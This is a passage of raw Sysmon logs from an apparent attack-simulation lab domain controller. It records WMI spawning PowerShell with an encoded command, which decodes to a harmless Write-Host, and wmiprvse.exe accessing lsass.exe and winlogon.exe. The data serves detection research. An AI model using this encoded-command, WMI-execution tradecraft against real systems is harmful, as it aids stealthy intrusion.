ll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4yxs5lqf.en1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.747{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ujau1wpv.rkf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.731{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.731{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002237389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.731{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3D5A1056C7CB3506FE309BE3EBFCCB,SHA256=C94F8CB8E354F4BF0A6CB93233B00D2B04D33ED8A41E962F0C0F62695C0FB438,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.731{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002237382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ujau1wpv.rkf.ps12021-03-02 16:52:52.715 10341000x80000000000000002237381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.725{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedCom VwByAGkAdABlAC0ASABvAHMAdAAgADAANABjAGEAZABlADYANQAtADEANgBlADYALQA0ADEAMgA3AC0AOQA1ADAANQAtAGMAZABlADAAMQAwAGIAYgA0AGYAOAAwAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002237379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.715{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002237377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.700{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.700{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.700{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.700{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05D158B3947C042F80295224F65530B9,SHA256=A8F227EAF8DD6899AA480E8B40D6BF30B2EB722262F139D86183E5E415836C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.700{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7